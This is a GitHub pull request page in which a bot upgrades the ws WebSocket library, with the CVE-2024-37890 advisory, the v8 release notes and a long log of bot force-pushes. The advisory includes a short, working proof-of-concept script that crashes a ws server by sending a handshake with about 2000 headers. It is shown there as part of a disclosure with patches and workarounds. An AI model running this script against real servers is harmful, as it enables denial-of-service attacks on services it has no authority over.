Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

chore(deps): update dependency ws to v8 [security] #7595

Open
wants to merge 1 commit into
base: develop
Choose a base branch
from

Conversation

live-github-bot[bot]
Copy link
Contributor

@live-github-bot live-github-bot bot commented Aug 13, 2024

This PR contains the following updates:

Package Type Update Change
ws devDependencies major 7 -> 8
ws dependencies minor 8.17.1 -> 8.18.0

GitHub Vulnerability Alerts

CVE-2024-37890

Impact

A request with a number of headers exceeding theserver.maxHeadersCount threshold could be used to crash a ws server.

Proof of concept

const http = require('http');
const WebSocket = require('ws');

const wss = new WebSocket.Server({ port: 0 }, function () {
  const chars = "!#$%&'*+-.0123456789abcdefghijklmnopqrstuvwxyz^_`|~".split('');
  const headers = {};
  let count = 0;

  for (let i = 0; i < chars.length; i++) {
    if (count === 2000) break;

    for (let j = 0; j < chars.length; j++) {
      const key = chars[i] + chars[j];
      headers[key] = 'x';

      if (++count === 2000) break;
    }
  }

  headers.Connection = 'Upgrade';
  headers.Upgrade = 'websocket';
  headers['Sec-WebSocket-Key'] = 'dGhlIHNhbXBsZSBub25jZQ==';
  headers['Sec-WebSocket-Version'] = '13';

  const request = http.request({
    headers: headers,
    host: '127.0.0.1',
    port: wss.address().port
  });

  request.end();
});

Patches

The vulnerability was fixed in [email protected] (websockets/ws@e55e510) and backported to [email protected] (websockets/ws@22c2876), [email protected] (websockets/ws@eeb76d3), and [email protected] (websockets/ws@4abd8f6)

Workarounds

In vulnerable versions of ws, the issue can be mitigated in the following ways:

  1. Reduce the maximum allowed length of the request headers using the --max-http-header-size=size and/or the maxHeaderSize options so that no more headers than the server.maxHeadersCount limit can be sent.
  2. Set server.maxHeadersCount to 0 so that no limit is applied.

Credits

The vulnerability was reported by Ryan LaPointe in https://github.com/websockets/ws/issues/2230.

References


Release Notes

websockets/ws (ws)

v8.0.0

Compare Source

Breaking changes

  • The WebSocket constructor now throws a SyntaxError if any of the
    subprotocol names are invalid or duplicated (0aecf0c).

  • The server now aborts the opening handshake if an invalid
    Sec-WebSocket-Protocol header field value is received (1877dde).

  • The protocols argument of handleProtocols hook is no longer an Array but
    a Set (1877dde).

  • The opening handshake is now aborted if the Sec-WebSocket-Extensions header
    field value is empty or it begins or ends with a white space (e814110).

  • Dropped support for Node.js < 10.0.0 (552b506).

  • The WebSocket constructor now throws a SyntaxError if the connection URL
    contains a fragment identifier or if the URL's protocol is not one of 'ws:',
    'wss:', or 'ws+unix:' (ebea038).

  • Text messages and close reasons are no longer decoded to strings. They are
    passed as Buffers to the listeners of their respective events. The listeners
    of the 'message' event now take a boolean argument specifying whether or not
    the message is binary (e173423).

    Existing code can be migrated by decoding the buffer explicitly.

    websocket.on('message', function message(data, isBinary) {
      const message = isBinary ? data : data.toString();
      // Continue as before.
    });
    
    websocket.on('close', function close(code, data) {
      const reason = data.toString();
      // Continue as before.
    });
  • The package now uses an ES module wrapper (78adf5f).

  • WebSocketServer.prototype.close() no longer closes existing connections
    (df7de57).

    Existing code can be migrated by closing the connections manually.

    websocketServer.close();
    for (const ws of websocketServer.clients) {
      ws.terminate();
    }
  • The callback of WebSocketServer.prototype.close() is now called with an
    error if the server is already closed (abde9cf).

  • WebSocket.prototype.addEventListener() is now a noop if the type argument
    is not one of 'close', 'error', 'message', or 'open' (9558ed1).

  • WebSocket.prototype.removeEventListener() now only removes listeners added
    with WebSocket.prototype.addEventListener() and only one at time (ea95d9c).

  • The value of the onclose, onerror, onmessage, and onopen properties is
    now null if the respective event handler is not set (6756cf5).

  • The OpenEvent class has been removed (21e6500).

Bug fixes

  • The event listeners added via handler properties are now independent from the
    event listeners added with WebSocket.prototype.addEventListener()
    (0b21c03).

Configuration

📅 Schedule: Branch creation - "" in timezone Europe/Paris, Automerge - At any time (no schedule defined).

🚦 Automerge: Disabled by config. Please merge this manually once you are satisfied.

Rebasing: Whenever PR becomes conflicted, or you tick the rebase/retry checkbox.

🔕 Ignore: Close this PR and you won't be reminded about these updates again.


  • If you want to rebase/retry this PR, check this box

This PR has been generated by Renovate Bot.

Copy link

vercel bot commented Aug 13, 2024

The latest updates on your projects. Learn more about Vercel for Git ↗︎

5 Skipped Deployments
Name Status Preview Comments Updated (UTC)
ledger-live-docs ⬜️ Ignored (Inspect) Visit Preview Dec 20, 2024 11:04pm
ledger-live-github-bot ⬜️ Ignored (Inspect) Visit Preview Dec 20, 2024 11:04pm
native-ui-storybook ⬜️ Ignored (Inspect) Visit Preview Dec 20, 2024 11:04pm
react-ui-storybook ⬜️ Ignored (Inspect) Visit Preview Dec 20, 2024 11:04pm
web-tools ⬜️ Ignored (Inspect) Visit Preview Dec 20, 2024 11:04pm

Copy link

socket-security bot commented Aug 13, 2024

Removed dependencies detected. Learn more about Socket for GitHub ↗︎

🚮 Removed packages: npm/[email protected]

View full report↗︎

@live-github-bot live-github-bot bot force-pushed the renovate/npm-ws-vulnerability branch from 87f790d to a2e74a9 Compare August 14, 2024 22:06
@live-github-bot live-github-bot bot added the common Has changes in live-common label Aug 14, 2024
@live-github-bot live-github-bot bot force-pushed the renovate/npm-ws-vulnerability branch from a2e74a9 to b37c1c5 Compare August 14, 2024 22:14
@live-github-bot live-github-bot bot removed the common Has changes in live-common label Aug 14, 2024
@live-github-bot live-github-bot bot force-pushed the renovate/npm-ws-vulnerability branch from b37c1c5 to 3bc15be Compare August 14, 2024 22:25
@live-github-bot live-github-bot bot added the common Has changes in live-common label Aug 14, 2024
@live-github-bot live-github-bot bot force-pushed the renovate/npm-ws-vulnerability branch from 3bc15be to 2819415 Compare August 14, 2024 22:34
@live-github-bot live-github-bot bot removed the common Has changes in live-common label Aug 14, 2024
@live-github-bot live-github-bot bot force-pushed the renovate/npm-ws-vulnerability branch from 2819415 to 412337d Compare August 14, 2024 22:42
@live-github-bot live-github-bot bot added the common Has changes in live-common label Aug 14, 2024
@live-github-bot live-github-bot bot force-pushed the renovate/npm-ws-vulnerability branch from 412337d to 63cba8c Compare August 14, 2024 22:48
@live-github-bot live-github-bot bot removed the common Has changes in live-common label Aug 14, 2024
@live-github-bot live-github-bot bot force-pushed the renovate/npm-ws-vulnerability branch from 63cba8c to 944b294 Compare August 14, 2024 22:55
@live-github-bot live-github-bot bot added the common Has changes in live-common label Aug 14, 2024
@live-github-bot live-github-bot bot force-pushed the renovate/npm-ws-vulnerability branch from 944b294 to 689a0ce Compare August 14, 2024 23:01
@live-github-bot live-github-bot bot removed the common Has changes in live-common label Aug 14, 2024
@live-github-bot live-github-bot bot force-pushed the renovate/npm-ws-vulnerability branch from 689a0ce to da11ebc Compare August 15, 2024 22:05
@live-github-bot live-github-bot bot added the common Has changes in live-common label Aug 15, 2024
@live-github-bot live-github-bot bot force-pushed the renovate/npm-ws-vulnerability branch from da11ebc to 4f03efb Compare August 15, 2024 22:14
@live-github-bot live-github-bot bot removed the common Has changes in live-common label Aug 15, 2024
@live-github-bot live-github-bot bot force-pushed the renovate/npm-ws-vulnerability branch from 4f03efb to dfc427a Compare August 15, 2024 22:25
@live-github-bot live-github-bot bot added the common Has changes in live-common label Aug 15, 2024
@live-github-bot live-github-bot bot added the common Has changes in live-common label Dec 19, 2024
@live-github-bot live-github-bot bot force-pushed the renovate/npm-ws-vulnerability branch from cbbc3cb to 4b1d0b1 Compare December 19, 2024 22:52
@live-github-bot live-github-bot bot removed the common Has changes in live-common label Dec 19, 2024
@live-github-bot live-github-bot bot force-pushed the renovate/npm-ws-vulnerability branch from 4b1d0b1 to 79be966 Compare December 19, 2024 22:59
@live-github-bot live-github-bot bot added the common Has changes in live-common label Dec 19, 2024
@live-github-bot live-github-bot bot force-pushed the renovate/npm-ws-vulnerability branch from 79be966 to be1e9c9 Compare December 19, 2024 23:04
@live-github-bot live-github-bot bot removed the common Has changes in live-common label Dec 19, 2024
@live-github-bot live-github-bot bot force-pushed the renovate/npm-ws-vulnerability branch from be1e9c9 to bb1ba75 Compare December 20, 2024 22:07
@live-github-bot live-github-bot bot added the common Has changes in live-common label Dec 20, 2024
@live-github-bot live-github-bot bot force-pushed the renovate/npm-ws-vulnerability branch from bb1ba75 to 28a6adb Compare December 20, 2024 22:15
@live-github-bot live-github-bot bot removed the common Has changes in live-common label Dec 20, 2024
@live-github-bot live-github-bot bot force-pushed the renovate/npm-ws-vulnerability branch from 28a6adb to 0998824 Compare December 20, 2024 22:28
@live-github-bot live-github-bot bot added the common Has changes in live-common label Dec 20, 2024
@live-github-bot live-github-bot bot force-pushed the renovate/npm-ws-vulnerability branch from 0998824 to ccc2ea0 Compare December 20, 2024 22:36
@live-github-bot live-github-bot bot removed the common Has changes in live-common label Dec 20, 2024
@live-github-bot live-github-bot bot force-pushed the renovate/npm-ws-vulnerability branch from ccc2ea0 to bac8e83 Compare December 20, 2024 22:44
@live-github-bot live-github-bot bot added the common Has changes in live-common label Dec 20, 2024
@live-github-bot live-github-bot bot force-pushed the renovate/npm-ws-vulnerability branch from bac8e83 to ecff918 Compare December 20, 2024 22:50
@live-github-bot live-github-bot bot removed the common Has changes in live-common label Dec 20, 2024
@live-github-bot live-github-bot bot force-pushed the renovate/npm-ws-vulnerability branch from ecff918 to cb0b666 Compare December 20, 2024 22:57
@live-github-bot live-github-bot bot added the common Has changes in live-common label Dec 20, 2024
@live-github-bot live-github-bot bot force-pushed the renovate/npm-ws-vulnerability branch from cb0b666 to c1c407c Compare December 20, 2024 23:03
@live-github-bot live-github-bot bot removed the common Has changes in live-common label Dec 20, 2024
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
Projects
None yet
Development

Successfully merging this pull request may close these issues.

0 participants